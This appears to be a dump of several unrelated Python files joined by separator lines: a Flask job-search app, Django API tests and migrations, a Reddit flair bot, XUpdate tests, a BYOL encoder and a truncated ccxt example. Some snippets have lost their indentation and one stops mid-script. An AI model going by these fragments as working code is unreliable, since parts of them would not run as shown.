INSERT INTO search (user_id, career_page, company, keywords, date_added) VALUES (?, ?, ?, ?, ?)
""", [session.get('user_id'), request.form.get('career_page'), get_company_name(request.form.get('career_page')), request.form.get('keywords').title(), datetime.datetime.now().date()])
return redirect(url_for("index"))
@app.route("/user_account", methods=["POST", "GET"])
def user_account():
load_user()
return render_template("user_account.html")
@app.route("/terminate_account", methods=["POST", "GET"])
def terminate_account():
load_user()
if request.args.get('confirmed'):
update_account_type_query = (
"UPDATE users SET account_type = '' WHERE id = ?"
)
with create_connection() as conn:
conn.cursor().execute(update_account_type_query, [session.get('user_id')])
session.clear()
return redirect(url_for("index"))
return render_template("terminate_account.html")
if __name__ == "__main__":
app.run(debug=True, ssl_context="adhoc")
|
from rest_framework import status
from django.urls import reverse
from rest_framework.test import APITestCase, APIRequestFactory
from api.models import *
from django.contrib.auth import get_user_model
from api.serializers import *
User = get_user_model()
# Helper Function
def create_nomaluser():
    """Create and return a regular (non-admin) test user.

    (Name typo "nomal" kept — other tests call it by this name.)
    """
    return User.objects.create_user(
        username='test', email='test@test.com', password='12345678'
    )
def create_superuser():
    """Create and return an admin test user."""
    return User.objects.create_superuser(
        username='admin', email='admin@admin.com', password='12345678'
    )
# Create your tests here.
class UserTestCase(APITestCase):
    """List/create/login tests for the user endpoints."""

    def test_list(self):
        # anonymous listing of users is allowed
        url = reverse('user-list')
        response = self.client.get(url)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_create(self):
        # anonymous registration with a full profile payload
        url = reverse('user-list')
        user = dict()
        user['username'] = 'test'
        user['password'] = '12345678'
        user['first_name'] = 'test_first_name'
        user['last_name'] = 'test_last_name'
        user['email'] = 'test@test.com'
        user['address'] = 'test_address'
        user['student_id'] = '0416031'
        user['birthday'] = '2016-04-25'
        user['phone_number'] = '0919610611'
        response = self.client.post(url, user)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        self.assertEqual(User.objects.count(), 1)
        # NOTE(review): assumes the pk sequence starts at 1 on a fresh test
        # DB — User.objects.get(username='test') would be more robust
        self.assertEqual(User.objects.get(pk=1).username, 'test')

    def test_login_and_token(self):
        # log in, then verify and refresh the returned JWT
        create_nomaluser()
        url = reverse('user-login')
        user = dict()
        user['username'] = 'test'
        user['password'] = '12345678'
        response = self.client.post(url, user)
        self.assertEqual(User.objects.count(), 1)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        data = dict()
        data['token'] = response.data['token']
        verify_url = reverse('verify-token')
        response = self.client.post(verify_url, data)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        refresh_url = reverse('refresh-token')
        response = self.client.post(refresh_url, data)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
class BookTestCase(APITestCase):
    """Create/list/update tests for the book endpoints (admin-only writes)."""

    def create_book(self):
        # build a book with two nested bar codes directly via the serializer
        book = dict()
        book['title'] = 'title'
        book['author'] = 'author'
        book['ISBN'] = '132456778'
        book['publisher'] = 'Leo'
        book['call_number'] = '1A2B'
        barcodes = []
        barcode_1 = dict()
        barcode_1['bar_code'] = '1234'
        barcode_2 = dict()
        barcode_2['bar_code'] = '5678'
        barcodes.append(barcode_1)
        barcodes.append(barcode_2)
        book['bar_codes'] = barcodes
        serializer = BookSerializer(data=book)
        serializer.is_valid()
        data = serializer.validated_data
        # NOTE(review): passes the TestCase instance as `self` to an unbound
        # serializer method — works only because create() ignores self;
        # BookSerializer(...).create(data) would be the conventional call
        return BookSerializer.create(self, data)

    def setUp(self):
        self.superuser = create_superuser()
        self.normaluser = create_nomaluser()

    def test_create(self):
        url = reverse('book-list')
        book = dict()
        book['title'] = 'title'
        book['author'] = 'author'
        book['ISBN'] = '132456778'
        book['publisher'] = 'Leo'
        book['call_number'] = '1A2B'
        barcodes = []
        barcode_1 = dict()
        barcode_1['bar_code'] = '1234'
        barcode_2 = dict()
        barcode_2['bar_code'] = '5678'
        barcodes.append(barcode_1)
        barcodes.append(barcode_2)
        book['bar_codes'] = barcodes
        # normal users may not write (NOTE(review): PATCH against the list
        # URL — presumably intended to exercise the permission class)
        self.client.force_login(user=self.normaluser)
        response = self.client.patch(url, book)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
        # admins may create; nested bar codes are created alongside
        self.client.force_login(user=self.superuser)
        response = self.client.post(url, book)
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        book = Book.objects.get()
        self.assertEqual(book.bar_codes.count(), 2)
        barcode_1 = book.bar_codes.get(id=1)
        barcode_2 = book.bar_codes.get(id=2)
        self.assertEqual(barcode_1.bar_code, '1234')
        self.assertEqual(barcode_1.book_id, book.id)
        self.assertEqual(barcode_2.bar_code, '5678')
        self.assertEqual(barcode_2.book_id, book.id)

    def test_list(self):
        # anonymous listing is allowed
        url = reverse('book-list')
        response = self.client.get(url)
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_update(self):
        old_book = self.create_book()
        url = reverse('book-detail', kwargs={'id': old_book.id})
        new_book = dict()
        new_book['title'] = 'title2'
        # normal users may not update
        self.client.force_login(user=self.normaluser)
        response = self.client.patch(url, new_book)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
        # admins may partially update
        self.client.force_login(user=self.superuser)
        response = self.client.patch(url, new_book)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        updated_book = Book.objects.get(id=old_book.id)
        self.assertEqual(updated_book.title, 'title2')
|
import re
from bs4 import BeautifulSoup
from datetime import datetime
import httplib
import praw
import os
if os.path.exists('settings.py'):
import settings
def GetPraw():
    """Build an authenticated PRAW Reddit client from the local settings.py.

    NOTE(review): relies on the guarded `import settings` at the top of the
    file — if settings.py is absent this raises NameError.
    """
    return praw.Reddit(client_id = settings.client_id,
                       client_secret = settings.client_secret,
                       username = settings.reddituser,
                       password = settings.redditpass,
                       user_agent = 'r/allthingszerg replay flair script')
def FindRedditName(events):
    """Scan replay chat events for a "reddit name: <name>" message.

    :param events: iterable of replay event dicts ('_event', 'm_string').
    :return: the lower-cased reddit user name, or False if none was found.
    """
    for event in events:
        if (event['_event'] == 'NNet.Game.SChatMessage'):
            # the message is lower-cased first, so only a-z can occur; the
            # old class [A-z0-9] accidentally matched [ \ ] ^ _ ` and missed
            # '-', which is legal in reddit user names
            matches = re.search('reddit *name[ :]*([a-z0-9_-]+)', event['m_string'].lower())
            if matches != None:
                return matches.group(1)
    return False
def RegionNameFromId(regionId):
    """Map a Battle.net region id to its short region code (None if unknown)."""
    region_codes = {1: "AM", 2: "EU", 3: "KR", 6: "SEA"}
    return region_codes.get(regionId)
def isflairbotmessage(message):
    """Return True when *message* is an account-link replay submission."""
    expected_subject = "account link replay"
    return message.subject == expected_subject
def isMessageBodyValidLink(message):
    """Extract a replay-download URL from a private message body.

    Recognises drop.sc and ggtracker.com replay links.

    :return: a direct replay download URL, or False when the body contains
        no recognised link.
    """
    # dots are now escaped — the original patterns used a bare '.' which
    # matched any character (e.g. "dropXsc/replay/1" would have matched)
    matches = re.search(r"drop\.sc/replay/([0-9]+)", message.body)
    if matches != None:
        return 'http://sc2replaystats.com/download/' + matches.group(1)
    matches = re.search(r"(ggtracker\.com/matches/[0-9]+)(/replay|)", message.body)
    if matches != None:
        return 'http://' + matches.group(1) + '/replay'
    return False
def bnetGet(region, url):
    """Fetch *url* from the <region>.battle.net host and return the raw body.

    NOTE(review): uses the Python-2-only `httplib` module (renamed
    `http.client` in Python 3) — this script targets Python 2.
    """
    conn = httplib.HTTPConnection(region + '.battle.net')
    conn.connect()
    request = conn.putrequest('GET', url)  # NOTE(review): return value unused
    conn.endheaders()
    conn.send('')
    resp = conn.getresponse()
    return resp.read()
def getLeagueFromSource(source):
    """Parse a battle.net profile page and return the player's league name.

    :param source: raw HTML of the profile page.
    :return: u'banned' when the page shows an error header, otherwise the
        league part of the first badge's CSS class (the class looks like
        'badge-<league>', so [6:] strips the 'badge-' prefix).
    :raises: re-raises any scrape failure after dumping the offending HTML
        to last.failure.txt for post-mortem debugging.
    """
    soup = BeautifulSoup(source, "html.parser")
    if (len(soup.select(".error-header")) > 0):
        # profile unavailable (banned/removed account)
        return u'banned'
    try:
        return soup.select(".badge-item")[0].select("span.badge")[0]['class'][1][6:]
    except:  # deliberately broad: record the page, then re-raise
        open("last.failure.txt", "w").write(source)
        raise
def getLeague(region, url):
    """Fetch a profile page and return (league, year, month, day) as strings.

    :param region: (host_prefix, locale) pair, e.g. ('eu', 'en').
    :param url: profile path fragment appended to /sc2/<locale>/profile/.

    The timestamp is now read once: the original called datetime.now()
    three separate times, which could straddle a date boundary mid-call.
    """
    source = bnetGet(region[0], "/sc2/" + region[1] + "/profile/" + url)
    leaguename = getLeagueFromSource(source)
    now = datetime.now()
    return (leaguename, str(now.year), str(now.month), str(now.day))
def readAccountsFile(fileName):
    """Parse the accounts file into dicts, one per line.

    Each line looks like "<bnet>,<redditName>,<region>,...".

    :return: list of {'bnet', 'redditName', 'region'} dicts.  (The original
        returned `map(...)` — a one-shot iterator on Python 3 — and never
        closed the file handle; this returns a list and closes the file.)
    """
    def readAccountsFileLine(line):
        matches = re.search("([^,]+),([^,]+),([^,]+),", line)
        return {
            'bnet': matches.group(1),
            'redditName': matches.group(2),
            'region': matches.group(3)
        }
    with open(fileName, "r") as accounts_file:
        return [readAccountsFileLine(line) for line in accounts_file]
def messageReply(message, text):
    """Reply to a private message and mark it read.

    NOTE(review): Python 2 print statement — this script is Python 2 only.
    """
    print "sending message:" + text
    message.reply(text)
    message.mark_read()
def stripOutClan(text):
    """Strip an optional leading clan tag (e.g. "[TL]<sp/>") from a player name."""
    clan_tag = "(?:\[|<|<)" + "[^\[\]<>]+" + "(?:\]|>|>)" + "<sp/>"
    pattern = "(" + clan_tag + ")?" + "(.+)"
    return re.search(pattern, text).group(2)
def updateUserFlair(subReddit, redditName, bNetName, regionName, leagueData):
    """Set a user's subreddit flair to "<League> <REGION> <y>-<m>-<d>"."""
    league, year, month, day = leagueData[0], leagueData[1], leagueData[2], leagueData[3]
    newFlairText = league.title() + " " + regionName + " " + year + "-" + month + "-" + day
    subReddit.flair.set(redditName, bNetName, newFlairText)
|
# Generated by Django 3.2 on 2022-03-13 20:52
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add an optional `image_url` field to the media.Media model."""

    dependencies = [
        ('media', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='media',
            name='image_url',
            # blank + null: the URL is optional both in forms and in the DB
            field=models.URLField(blank=True, max_length=1024, null=True),
        ),
    ]
|
from onnx_runner_generator import generate_onnx_runner

# Map of ONNX operator name -> generation options.  Note: 'inputs' is a
# *string* of Python source that the generator pastes into the emitted runner.
operators = {}
operators['Sigmoid'] = {
    'inputs': '[np.array([1, 2, 3]).astype(np.float32)]'
}
operators['BitShift'] = {
    # Bug fix: np.random.randn takes dimensions as separate positional
    # arguments — randn((2,3,4)) raised TypeError when the generated runner
    # ran.  BitShift also requires unsigned-integer tensors, so cast.
    'inputs': '[np.random.randn(2, 3, 4).astype(np.uint8), np.random.randn(2, 3, 4).astype(np.uint8)]'
}

for operator, operator_info in operators.items():
    generate_onnx_runner(operator, operator_info['inputs'])
|
#!/usr/bin/env python
import unittest
import cStringIO
from amara.lib import testsupport, inputsource
from amara.xupdate import reader, XUpdateError, apply_xupdate
class test_xupdate(unittest.TestCase):
    """Base class: subclasses supply `source`/`xupdate` class attributes.

    NOTE(review): Python-2-only — `__metaclass__` is ignored by Python 3.
    The metaclass attaches a generated `runTest` to every *subclass*; the
    base class itself is skipped because it defines `__metaclass__`.
    Also note the generated test only checks that apply_xupdate does not
    raise — the `expected` attributes are never compared.
    """
    class __metaclass__(type):
        def __init__(cls, name, bases, members):
            if '__metaclass__' not in members:
                test_method = cls.new_test_method()
                setattr(cls, 'runTest', test_method)
            return

    def new_test_method(cls):
        # called on the metaclass, so `cls` is the test class being created
        def test_method(self):
            source = inputsource(self.source, 'source')
            xupdate = inputsource(self.xupdate, 'xupdate-source')
            document = apply_xupdate(source, xupdate)
            return
        return test_method
# this first test is from the spec
# (http://www.xmldb.org/xupdate/xupdate-wd.html)
# "Example of Usage" section
# Data-only subclasses of test_xupdate: each supplies `source` (input XML),
# `xupdate` (the modification script) and `expected` (the serialized result).
# NOTE(review): `expected` is never compared by the generated test_method —
# the harness only verifies that apply_xupdate does not raise.
class test_spec_1(test_xupdate):
    # insert-after: construct and insert a new <address> after the first
    source = """<?xml version="1.0"?>
<addresses version="1.0">
<address id="1">
<fullname>Andreas Laux</fullname>
<born day='1' month='12' year='1978'/>
<town>Leipzig</town>
<country>Germany</country>
</address>
</addresses>
"""
    xupdate = """<?xml version="1.0"?>
<xupdate:modifications
version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:insert-after select="/addresses/address[1]" >
<xupdate:element name="address">
<xupdate:attribute name="id">2</xupdate:attribute>
<fullname>Lars Martin</fullname>
<born day='2' month='12' year='1974'/>
<town>Leizig</town>
<country>Germany</country>
</xupdate:element>
</xupdate:insert-after>
</xupdate:modifications>
"""
    expected = """<?xml version='1.0' encoding='UTF-8'?>
<addresses version='1.0'>
<address id='1'>
<fullname>Andreas Laux</fullname>
<born day='1' month='12' year='1978'/>
<town>Leipzig</town>
<country>Germany</country>
</address><address id='2'><fullname>Lars Martin</fullname><born day='2' month='12' year='1974'/><town>Leizig</town><country>Germany</country></address>
</addresses>"""


class test_append(test_xupdate):
    # append a constructed element as the last child of /addresses
    source = """<?xml version="1.0"?>
<addresses>
<address>
<town>Los Angeles</town>
</address>
</addresses>
"""
    xupdate = """<?xml version="1.0"?>
<xupdate:modifications
version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:append select="/addresses" child="last()">
<xupdate:element name="address">
<town>San Francisco</town>
</xupdate:element>
</xupdate:append>
</xupdate:modifications>
"""
    expected = """<?xml version='1.0' encoding='UTF-8'?>
<addresses>
<address>
<town>Los Angeles</town>
</address>
<address><town>San Francisco</town></address></addresses>"""


class test_update(test_xupdate):
    # replace the text content of an existing element
    source = """<?xml version="1.0"?>
<addresses>
<address>
<town>Los Angeles</town>
</address>
<address>
<town>San Francisco</town>
</address>
</addresses>
"""
    xupdate = """<?xml version="1.0"?>
<xupdate:modifications
version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:update select="/addresses/address[2]/town">
New York
</xupdate:update>
</xupdate:modifications>
"""
    expected = """<?xml version='1.0' encoding='UTF-8'?>
<addresses>
<address>
<town>Los Angeles</town>
</address>
<address>
<town>
New York
</town>
</address>
</addresses>"""


class test_remove(test_xupdate):
    # remove the first <address>; the '_'->' ' replace builds trailing spaces
    source = """<?xml version="1.0"?>
<addresses>
<address>
<town>Los Angeles</town>
</address>
<address>
<town>San Francisco</town>
</address>
</addresses>
"""
    xupdate = """<?xml version="1.0"?>
<xupdate:modifications
version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:remove select="/addresses/address[1]"/>
</xupdate:modifications>
"""
    expected = """<?xml version='1.0' encoding='UTF-8'?>
<addresses>
__
<address>
<town>San Francisco</town>
</address>
</addresses>""".replace('_', ' ')


class test_attribute_append(test_xupdate):
    # append an attribute computed from an xupdate variable
    source = """<ftss:Container xmlns:ftss="http://xmlns.4suite.org/reserved">
<ftss:Children/>
</ftss:Container>"""
    xupdate = """<?xml version="1.0"?>
<xupdate:modifications
version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
xmlns:ftss="http://xmlns.4suite.org/reserved"
xmlns:xlink="http://www.w3.org/1999/xlink"
>
<xupdate:variable name='child-name'>FOO</xupdate:variable>
<xupdate:append select="(ftss:Repository | ftss:Container)/ftss:Children"
child="last()">
<ftss:ChildReference xlink:type="simple" xlink:actuate="onLoad" xlink:show="embed">
<xupdate:attribute name='xlink:href'>
<xupdate:value-of select='concat($child-name,";metadata")'/>
</xupdate:attribute>
</ftss:ChildReference>
</xupdate:append>
</xupdate:modifications>
"""
    expected = """<?xml version='1.0' encoding='UTF-8'?>
<ftss:Container xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ftss='http://xmlns.4suite.org/reserved'>\n <ftss:Children><ftss:ChildReference xlink:href='FOO;metadata' xlink:type='simple' xlink:actuate='onLoad' xlink:show='embed'/></ftss:Children>\n</ftss:Container>"""


class test_spec_2(test_xupdate):
    # same append as test_append but with explicit utf-8 input declarations
    source = """<?xml version="1.0" encoding="utf-8"?>
<addresses>
<address>
<town>Los Angeles</town>
</address>
</addresses>
"""
    xupdate = """<?xml version="1.0" encoding="utf-8"?>
<xupdate:modifications version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:append select="/addresses" child="last()">
<xupdate:element name="address">
<town>San Francisco</town>
</xupdate:element>
</xupdate:append>
</xupdate:modifications>
"""
    expected = """<?xml version="1.0" encoding="UTF-8"?>
<addresses>
<address>
<town>Los Angeles</town>
</address>
<address><town>San Francisco</town></address></addresses>
"""


# The following was posted on SourceForge as bug #704627
# (attributes were not being appended properly)
class test_attribute_append_2(test_xupdate):
    source = """<?xml version='1.0'?>
<test><t id='t1'>one</t><t id='t2'>two</t></test>
"""
    xupdate = """<?xml version="1.0"?>
<xu:modifications version="1.0" xmlns:xu="http://www.xmldb.org/xupdate">
<xu:append select="/test"><xu:attribute name="a1">a1v</xu:attribute></xu:append>
</xu:modifications>
"""
    expected = """<?xml version="1.0" encoding="UTF-8"?>
<test a1="a1v"><t id="t1">one</t><t id="t2">two</t></test>"""


class test_usecase(test_xupdate):
    # append an attribute to an element selected by attribute predicates;
    # comments and CDATA sections in the source must survive
    source = """<?xml version="1.0" encoding="UTF-8"?>
<addresses>
<address id="1">
<!--This is the users name-->
<name>
<first>John</first>
<last>Smith</last>
</name>
<city>Houston</city>
<state>Texas</state>
<country>United States</country>
<phone type="home">333-300-0300</phone>
<phone type="work">333-500-9080</phone>
<note><![CDATA[This is a new user]]></note>
</address>
</addresses>"""
    xupdate = """<?xml version="1.0" encoding="UTF-8"?>
<xupdate:modifications version="1.0" xmlns:xupdate="http://www.xmldb.org/xupdate">
<xupdate:append select="/addresses/address[@id = 1]/phone[@type='work']">
<xupdate:attribute name="extension">223</xupdate:attribute>
</xupdate:append>
</xupdate:modifications>"""
    expected = """<?xml version="1.0" encoding="UTF-8"?>
<addresses>
<address id="1">
<!--This is the users name-->
<name>
<first>John</first>
<last>Smith</last>
</name>
<city>Houston</city>
<state>Texas</state>
<country>United States</country>
<phone type="home">333-300-0300</phone>
<phone type="work" extension="223">333-500-9080</phone>
<note><![CDATA[This is a new user]]></note>
</address>
</addresses>"""


# rename tests based partly on SF bug #704627 and
# http://lists.fourthought.com/pipermail/4suite/2002-November/004602.html
#
class test_rename(test_xupdate):
    # exercises every rename variant: elements, attributes, the document
    # element, multi-node selections, renames of freshly inserted nodes
    source = """<?xml version="1.0" encoding="utf-8"?>
<addresses version="1.0">
<address id="1">
<fullname>Andreas Laux</fullname>
<born day="1" month="12" year="1978"/>
<town>Leipzig</town>
<country>Germany</country>
</address>
<address id="2">
<fullname>Heiko Smit</fullname>
<born day="4" month="8" year="1970"/>
<town>Berlin</town>
<country>Germany</country>
</address>
<address id="3">
<fullname>Vincent Q. Lu</fullname>
<born day="9" month="9" year="1990"/>
<town>Hong Kong</town>
<country>China</country>
</address>
<address id="4">
<fullname>Michelle Lambert</fullname>
<born day="10" month="10" year="1958"/>
<town>Toronto</town>
<country>Canada</country>
</address>
</addresses>"""
    xupdate = """<?xml version="1.0" encoding="UTF-8"?>
<xupdate:modifications version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
xmlns:my="urn:bogus:myns">
<!-- rename of an element -->
<xupdate:rename select="/addresses/address[@id='1']/town">city</xupdate:rename>
<!-- rename of an attribute -->
<xupdate:rename select="/addresses/address[@id='1']/born/@year">annum</xupdate:rename>
<!-- rename of document element -->
<xupdate:rename select="/addresses">info</xupdate:rename>
<!-- rename of multiple elements -->
<xupdate:rename select="/*/address">data</xupdate:rename>
<!-- rename of multiple attributes (1 per element) -->
<xupdate:rename select="/*/*/@id[. > 1 and . < 4]">num</xupdate:rename>
<!-- rename of multiple attributes (all in same element) -->
<xupdate:rename select="/*/*[@id='4']/born/@*[name()='day' or name()='month']">zzz</xupdate:rename>
<!-- rename of renamed element -->
<xupdate:rename select="/info">my:info</xupdate:rename>
<!-- insert/append and rename of multiple elements -->
<xupdate:insert-before select="/*/*[1]/born"><xupdate:element name="new-elem"/></xupdate:insert-before>
<xupdate:insert-before select="/*/*[2]/born"><xupdate:element name="new-elem"/></xupdate:insert-before>
<xupdate:insert-before select="/*/*[3]/born"><xupdate:element name="new-elem"/></xupdate:insert-before>
<xupdate:insert-before select="/*/*[4]/born"><xupdate:element name="new-elem"/></xupdate:insert-before>
<xupdate:rename select="/*/*/new-elem">my:new-elem</xupdate:rename>
<xupdate:append select="/*/*" child="last()"><my:another-elem/></xupdate:append>
<xupdate:rename select="/*/*/my:another-elem">my:other-elem</xupdate:rename>
<xupdate:insert-after select="/*/*/my:other-elem"><xupdate:element name="my:foo"/></xupdate:insert-after>
</xupdate:modifications>
"""
    expected = """<?xml version="1.0" encoding="UTF-8"?>
<my:info xmlns:my="urn:bogus:myns" version="1.0">
<data id="1">
<fullname>Andreas Laux</fullname>
<my:new-elem/><born day="1" month="12" annum="1978"/>
<city>Leipzig</city>
<country>Germany</country>
<my:other-elem/><my:foo/></data>
<data num="2">
<fullname>Heiko Smit</fullname>
<my:new-elem/><born day="4" month="8" year="1970"/>
<town>Berlin</town>
<country>Germany</country>
<my:other-elem/><my:foo/></data>
<data num="3">
<fullname>Vincent Q. Lu</fullname>
<my:new-elem/><born day="9" month="9" year="1990"/>
<town>Hong Kong</town>
<country>China</country>
<my:other-elem/><my:foo/></data>
<data id="4">
<fullname>Michelle Lambert</fullname>
<my:new-elem/><born zzz="10" year="1958"/>
<town>Toronto</town>
<country>Canada</country>
<my:other-elem/><my:foo/></data>
</my:info>
"""
#-----------------------------------------------------------------------
class test_xupdate_error(unittest.TestCase):
    """Base for tests asserting that apply_xupdate raises a given XUpdateError."""
    # trick __metaclass__ into not treating this as a test-case
    class __metaclass__(type):
        def __init__(cls, name, bases, members):
            if '__metaclass__' not in members:
                test_method = cls.new_test_method()
                setattr(cls, 'runTest', test_method)
            return

    @classmethod
    def new_test_method(cls):
        def format_error(error_code):
            # map the numeric code back to its symbolic XUpdateError.* name
            # for a readable assertion message
            for name, value in XUpdateError.__dict__.iteritems():
                if value == error_code:
                    error_code = 'XUpdateError.' + name
                    break
            return 'XUpdateError(%s)' % error_code
        def test_method(self):
            source = inputsource(self.source, 'source')
            xupdate = inputsource(self.xupdate, 'xupdate-error-source')
            expected = format_error(self.error_code)
            try:
                document = apply_xupdate(source, xupdate)
            # Python 2 except syntax — this module is Python 2 only
            except XUpdateError, error:
                compared = format_error(error.code)
                self.assertEquals(expected, compared)
            else:
                self.fail('%s not raised' % expected)
            return
        return test_method

    # shared input document each error subclass attempts to modify
    source = """<?xml version="1.0"?>
<addresses>
<address>
<town>Los Angeles</town>
</address>
</addresses>
"""
# Error-case subclasses: each supplies a malformed `xupdate` document and
# the XUpdateError code that applying it must raise.
class test_version_missing(test_xupdate_error):
    # modifications element lacks the required version attribute
    xupdate = """<?xml version="1.0"?>
<xupdate:modifications
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:append select="/addresses" child="last()">
<xupdate:element name="address">
<town>San Francisco</town>
</xupdate:element>
</xupdate:append>
</xupdate:modifications>
"""
    error_code = XUpdateError.MISSING_REQUIRED_ATTRIBUTE


class test_select_missing(test_xupdate_error):
    # append element lacks the required select attribute
    xupdate = """<?xml version="1.0"?>
<xupdate:modifications
version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:append child="last()">
<xupdate:element name="address">
<town>San Francisco</town>
</xupdate:element>
</xupdate:append>
</xupdate:modifications>
"""
    error_code = XUpdateError.MISSING_REQUIRED_ATTRIBUTE


class test_select_invalid(test_xupdate_error):
    # select="/.." is syntactically valid XPath but selects nothing usable
    xupdate = """<?xml version="1.0"?>
<xupdate:modifications
version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:append select="/.." child="last()">
<xupdate:element name="address">
<town>San Francisco</town>
</xupdate:element>
</xupdate:append>
</xupdate:modifications>
"""
    error_code = XUpdateError.INVALID_SELECT


class test_syntax_error(test_xupdate_error):
    # "!/addresses" is not a parsable XPath expression
    xupdate = """<?xml version="1.0"?>
<xupdate:modifications
version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:append select="!/addresses" child="last()">
<xupdate:element name="address">
<town>San Francisco</town>
</xupdate:element>
</xupdate:append>
</xupdate:modifications>
"""
    error_code = XUpdateError.SYNTAX_ERROR


class test_test_missing(test_xupdate_error):
    # xupdate:if lacks its required test attribute
    xupdate = """<?xml version="1.0"?>
<xupdate:modifications
version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:if>
<xupdate:append select="/addresses" child="last()">
<xupdate:element name="address">
<town>San Francisco</town>
</xupdate:element>
</xupdate:append>
</xupdate:if>
</xupdate:modifications>
"""
    error_code = XUpdateError.MISSING_REQUIRED_ATTRIBUTE


class test_illegal_element(test_xupdate_error):
    # xupdate:prepend is not a legal XUpdate element
    xupdate = """<?xml version="1.0"?>
<xupdate:modifications
version="1.0"
xmlns:xupdate="http://www.xmldb.org/xupdate"
>
<xupdate:prepend select="/addresses" child="last()">
<xupdate:element name="address">
<town>San Francisco</town>
</xupdate:element>
</xupdate:prepend>
</xupdate:modifications>
"""
    error_code = XUpdateError.ILLEGAL_ELEMENT
if __name__ == '__main__':
    # Amara's test harness entry point
    testsupport.test_main()
|
from typing import Union
import torch
from torch import nn, Tensor
from byol.utils import mlp
class EncoderWrapper(nn.Module):
    """Wraps a backbone network for BYOL, attaching a projection MLP.

    A forward hook on the chosen *layer* captures that layer's activations
    and passes them through a lazily-built projection MLP; `forward` returns
    the projected features rather than the wrapped model's own output.

    :param model: backbone network to wrap.
    :param projection_size: output dimension of the projection MLP.
    :param hidden_size: hidden dimension of the projection MLP.
    :param layer: which layer to hook — a name from `model.named_modules()`
        (str) or an index into `model.children()` (int; default -2, i.e.
        the penultimate child).
    """
    def __init__(
        self,
        model: nn.Module,
        projection_size: int = 256,
        hidden_size: int = 4096,
        layer: Union[str, int] = -2,
    ):
        super().__init__()
        self.model = model
        self.projection_size = projection_size
        self.hidden_size = hidden_size
        self.layer = layer
        # Projector is created lazily on the first forward pass, once the
        # hooked layer's output width is known.
        self._projector = None
        self._projector_dim = None
        self._encoded = torch.empty(0)
        self._register_hook()

    @property
    def projector(self):
        # Lazily build the MLP.  NOTE(review): requires _projector_dim to be
        # set by a prior hook invocation — accessing this before the first
        # forward pass would call mlp(None, ...).
        if self._projector is None:
            self._projector = mlp(
                self._projector_dim, self.projection_size, self.hidden_size
            )
        return self._projector

    def _hook(self, _, __, output):
        # Forward hook: flatten the hooked layer's output to (batch, features)
        # and cache its projection for `forward` to return.
        output = output.flatten(start_dim=1)
        if self._projector_dim is None:
            # first call: record the feature width so `projector` can build
            self._projector_dim = output.shape[-1]
        self._encoded = self.projector(output)

    def _register_hook(self):
        # Resolve `self.layer` (name or index) to a module and attach the hook.
        if isinstance(self.layer, str):
            layer = dict([*self.model.named_modules()])[self.layer]
        else:
            layer = list(self.model.children())[self.layer]
        layer.register_forward_hook(self._hook)

    def forward(self, x: Tensor) -> Tensor:
        # Run the wrapped model for its side effect (triggering the hook);
        # the model's own output is discarded.
        _ = self.model(x)
        return self._encoded
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2017-05-15 06:40
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Remove the legacy Audit model (and Variable's FK to it) from proso_models."""

    dependencies = [
        ('proso_models', '0001_initial'),
    ]

    operations = [
        # indexes and FK fields must be dropped before the model itself
        migrations.AlterIndexTogether(
            name='audit',
            index_together=set([]),
        ),
        migrations.RemoveField(
            model_name='audit',
            name='answer',
        ),
        migrations.RemoveField(
            model_name='audit',
            name='info',
        ),
        migrations.RemoveField(
            model_name='audit',
            name='item_primary',
        ),
        migrations.RemoveField(
            model_name='audit',
            name='item_secondary',
        ),
        migrations.RemoveField(
            model_name='audit',
            name='user',
        ),
        migrations.RemoveField(
            model_name='variable',
            name='audit',
        ),
        migrations.DeleteModel(
            name='Audit',
        ),
    ]
|
# -*- coding: utf-8 -*-

import asyncio
import functools
import os
import sys

# ------------------------------------------------------------------------------

# make the repository root importable when running the example in place
root = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
sys.path.append(root)

# ------------------------------------------------------------------------------

# `async` became a reserved keyword in Python 3.7, making `import ccxt.async`
# a SyntaxError; ccxt renamed the module to `ccxt.async_support`.
import ccxt.async_support as ccxt  # noqa: E402
async def print_ticker(symbol, id):
    """Fetch and print one ticker for *symbol* from the exchange named *id*.

    Verbose mode shows the order of execution, to verify concurrency.
    """
    exchange = getattr(ccxt, id)({'verbose': True})
    try:
        print(await exchange.fetch_ticker(symbol))
    finally:
        # release the underlying HTTP session — without this every exchange
        # instance leaks an open connection pool
        await exchange.close()
# ------------------------------------------------------------------------------

if __name__ == '__main__':
    symbol = 'ETH/BTC'
    print_ethbtc_ticker = functools.partial(print_ticker, symbol)
    exchange_ids = [
        'bitfinex',
        'poloniex',
        'kraken',
        'gdax',
        'bittrex',
        'hitbtc',
    ]
    # Gather the coroutines we created ourselves instead of relying on
    # asyncio.Task.all_tasks(), which was removed in Python 3.9 (and
    # ensure_future() outside a running loop is deprecated).
    loop = asyncio.get_event_loop()
